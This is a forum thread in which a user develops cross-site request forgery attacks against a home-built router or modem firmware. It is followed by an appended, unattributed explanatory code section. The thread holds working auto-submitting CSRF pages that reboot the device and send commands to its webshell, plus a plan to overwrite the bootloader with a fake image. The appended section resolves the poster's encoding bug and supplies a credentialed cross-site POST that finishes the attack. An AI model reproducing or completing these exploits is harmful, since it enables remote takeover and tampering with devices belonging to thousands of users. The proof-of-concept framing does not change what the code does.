The Web Design Group
File Input Alternative
sudobash
post Jun 5 2010, 10:15 PM
Post #1

I am not an HTML/JavaScript guy; I like Assembler/C/C++, so I need some help from you web guys!

Basically, what I want is, instead of prompting the user for a file to input, to specify my own file from the internet and skip the whole INPUT box that pops up.

<form action="bootloader.cgi" method="post" name="bootloader" enctype="multipart/form-data">
<input type="file" name="filename" />
<input type="button" value="Upload" onclick="document.bootloader.submit()" />
</form>

Thanks
Brian Chandler
post Jun 5 2010, 10:48 PM
Post #2

I believe that for (obvious!) security reasons you can't just specify the file the user is going to send you. Why are you trying to do this anyway?
sudobash
post Jun 5 2010, 10:57 PM
Post #3

I can change the code to whatever I want; it doesn't have to be an INPUT box, but it needs to be submitted via a FORM. I want to change it to use a static file instead of an INPUT file, so that it is not input from a PC but rather a static file at the home website. I am modifying firmware that my company has just purchased.
sudobash
post Jun 5 2010, 11:05 PM
Post #4

Basically, I need a replacement that works with the above form but substitutes the INPUT box for a URL to the firmware binary that is going to be hosted on the company website.
pandy
post Jun 5 2010, 11:14 PM
Post #5

I'm confused. Do you want the form to "upload" a file that's already on the server, or just the URL to it? In either case, why? You already have one and know the other.
Brian Chandler
post Jun 6 2010, 04:00 AM
Post #6

QUOTE(sudobash @ Jun 6 2010, 01:05 PM)

Basically I need a replacement that works with the above form but substitutes the INPUT Box for a URL to the firmware binary that is going to be hosted on the company website.


Unfortunately I simply can't guess what you mean from the form. Suppose J Soap, member of the public, visits your website, and submits this form. What should then happen? (E.g. "A binary file should be installed on Soap's computer")
sudobash
post Jun 6 2010, 09:01 AM
Post #7

Alright, I might as well just come clean; you all aren't stupid. I am developing a CSRF exploit as a proof of concept to prove that an associate needs to secure his homemade firmware (thousands of people use it). I am showing him that it is possible to overwrite his firmware with a Cross-Site Request Forgery attack. I have been successful in resetting the unit (I have my own unit for testing), and I know it is possible to do more with the right POST form. The web server does not protect against CSRF and is vulnerable to software overwrite if done correctly. Here is the form to restart it remotely (the victim must click a link to this page):

<html>
<head>
<title>Test for CSRF</title>
</head>

<body>

<!-- hidden form aimed at the device's own web interface; the victim's browser
     attaches its cookies to the cross-site POST -->
<form name="csrf" method="post" action="http://192.168.100.1/reboot.html">
<input type="hidden" name="reboot" value="true">
</form>

<!-- submits as soon as the page loads, with no click required -->
<script>document.csrf.submit()</script>

</body>
</html>


Now, instead of just rebooting the unit, which is annoying but only for about a minute, I am certain that with the right HTML/JavaScript the actual firmware or bootloader could be overwritten, and then there will be a real reason to upgrade the firmware to be more secure. We can fix these overwrites within 15 minutes, but I am doing this to prove that the software needs to be upgraded, since it hasn't been in many months. If you want more information, PM me and I will inform you which firmware I am speaking of.

sudobash
post Jun 6 2010, 09:06 AM
Post #8

I was going after the bootloader because it will be quicker to flash (repair) and cause less damage.
sudobash
post Jun 6 2010, 09:10 AM
Post #9

So, if you see what I am saying now: instead of picking a file from the PC, it needs to pull the fake bootloader image from the internet and use it instead of the input file when it submits the bootloader to the unit with the POST form. Now I have been as truthful as I can be, and if you don't want to help me, I will figure it out eventually when I take the time...

sudobash
post Jun 6 2010, 10:01 AM
Post #10

I guess this would be a combination of CSRF and CSFU (Cross-Site File Upload)...
Brian Chandler
post Jun 6 2010, 10:20 AM
Post #11

OK, so you mean that (e.g.) http://192.168.100.1 is the (local) web address for my gizmo (modem, whatever), and sending various POST arguments to this address causes various updates to the gizmo. One such is updating the firmware, which I do by downloading the new version from the Web, then submitting the form, with a file upload box, in which I select the file I've just downloaded. Right?

In such cases, of course, it would be helpful if the (genuine) web form could select the file automatically, but as we've said this is generally blocked to reduce accidents.

But if the authentication is weak (just using a cookie, for example), a malicious page only has to make a POST request disguised as something else. As I recall, the uploaded file is handled by a completely different mechanism from simple POST or GET arguments. So, on the face of it, you can't fake uploading a file unless the browser knows it's uploading a file, which it normally does by showing the file selection dialog box.

In particular, the system is designed explicitly so you can't "pull the fake bootloader image from the internet and use it instead of the input file". Of course I am not an expert in this, so I can't say there is no way to break it, but I don't believe any simple combination of "Javascript and HTML" is going to do it.
sudobash
post Jun 11 2010, 06:18 PM
Post #12

I Wiresharked an update of the bootloader and the firmware upgrade procedure, and it is definitely not using GET or POST but something completely different, like you said, so I decided to go another route. The device I am using has a webshell interface that is vulnerable to CSRF, as are all its pages... Here is the code that I have come up with so far:

<html>
<head>
</head>
<body>
<form name="webshell" method="post" action="http://192.168.100.1/webshell.cgi">
<!-- the input's id and the form's name are both "webshell", so the script
     looks the input up by id explicitly instead of relying on a global name -->
<input type="hidden" id="webshell" name="command">
</form>
<script>
var test = "read_memory 0x80101010";
// escape() turns the space into %20 before the form is serialized
document.getElementById("webshell").value = escape(test);
document.webshell.submit();
</script>
</body>
</html>

The problem that I am having now is that, instead of POSTing like the normal page does, it is giving me an error, which I verified with Wireshark to be a URL-encoding problem... My commands, whether LS, read_memory, or write_memory, work by themselves and return either data or an error requiring more parameters, but when I add the parameters, that is when the encoding problems occur. Example:
read_memory by itself will return "Missing Address to READ"
read_memory 0x80000000 will return an error saying "Command not found: read_memory%200x80000000"

I need the POST form to actually be transmitted as %20 and not +

I am going to post what I found in both Wireshark POSTs:

Correct:
63 6f 6d 6d 61 6e 64 3d 72 65 61 64 5f 6d 65 6d 6f 72 79 25 32 30 30 78 38 30 30 30 30 30 30 30

Which means:
command=read_memory%200x80000000

Incorrect:
63 6f 6d 6d 61 6e 64 3d 72 65 61 64 5f 6d 65 6d 6f 72 79 25 32 35 32 30 30 78 38 30 30 30 30 30 30 30

Which means:
command=read_memory%25200x80000000


Please, someone help me out with this POST URL-encoding crap!

sudobash
post Jun 11 2010, 06:22 PM
Post #13

If I'm not mistaken, the %2520 is %20 but with the % encoded as %25 and the 20 added after it, instead of the space being encoded as %20; so it comes out as %2520? Someone please help me out?
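The two Wireshark captures in post #12 and the guess in post #13 can be reproduced exactly. The following is an added example, not the original poster's code: a Node script that emulates the browser's application/x-www-form-urlencoded serializer, shows why `escape()` followed by a form submit produces `%2520`, and shows the two other bodies a browser can be made to send (the form's own `+`, and a hand-built `%20`). The `sendHandBuiltBody` function is the assumed browser-side counterpart and is not run under Node; the device URL and the `command` field name are taken from the posted form.

```javascript
// Added example (not the thread's code): reproduce the captured request bodies
// and show how to get %20 onto the wire instead of + or %2520.

// Emulates what a browser does to one form value under the default enctype
// application/x-www-form-urlencoded: alphanumerics and * - . _ pass through,
// a space becomes '+', and every other byte (including '%') becomes %XX.
function formUrlEncodeValue(str) {
  let out = '';
  for (const byte of Buffer.from(str, 'utf8')) {
    const ch = String.fromCharCode(byte);
    if (/[A-Za-z0-9*\-._]/.test(ch)) out += ch;
    else if (byte === 0x20) out += '+';
    else out += '%' + byte.toString(16).toUpperCase().padStart(2, '0');
  }
  return out;
}

// Serialize a whole form as name=value&name=value, as a form submit would.
function formUrlEncode(fields) {
  return Object.entries(fields)
    .map(([k, v]) => formUrlEncodeValue(k) + '=' + formUrlEncodeValue(v))
    .join('&');
}

// Render a body in the same spaced-hex form as the Wireshark dumps in the post.
function toHexDump(body) {
  return Buffer.from(body, 'latin1').toString('hex').match(/../g).join(' ');
}

const COMMAND = 'read_memory 0x80000000';

// 1) What the posted page does: escape() turns the space into %20, then the
//    form serializer encodes the '%' of that %20 as %25, giving %2520.
function doubleEncodedBody() {
  return formUrlEncode({ command: escape(COMMAND) });
}

// 2) Letting the form serializer see the raw value gives '+' for the space,
//    which the poster reports the webshell does not accept either.
function plusEncodedBody() {
  return formUrlEncode({ command: COMMAND });
}

// 3) To put a literal %20 on the wire, bypass the form serializer and build the
//    body by hand; encodeURIComponent encodes the space as %20 and nothing else here.
function wantedBody() {
  return 'command=' + encodeURIComponent(COMMAND);
}

// Browser side (assumed; only meaningful in a browser, never called under Node):
// send the hand-built body with the same cookies a form submission carries.
// application/x-www-form-urlencoded is a content type browsers send cross-site
// without a preflight, so the request reaches the device just as the
// auto-submitted form did; the response is not readable cross-origin, but the
// side effect on the device still happens.
function sendHandBuiltBody(url, body) {
  const xhr = new XMLHttpRequest();
  xhr.open('POST', url, true);
  xhr.withCredentials = true;
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xhr.send(body);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('double-encoded:', toHexDump(doubleEncodedBody()));
  console.log('plus-encoded:  ', toHexDump(plusEncodedBody()));
  console.log('wanted:        ', toHexDump(wantedBody()));
}
```

The first hex dump matches the "Incorrect" capture and the third matches the "Correct" one, which confirms the guess in post #13: the form serializer never emits `%20` for a space, so any `%20` placed in the value by hand is itself encoded. The practical consequence for the device is that its CGI only decodes the body once, so an interface that wants exact `%20` can still be driven cross-site by any page that hand-builds the body; cookie-only authentication is the real problem, as discussed in post #11. Note that browsers today default new cookies to `SameSite=Lax`, which stops a cross-site POST from carrying the session cookie unless the device explicitly opts out; that was not the case in 2010.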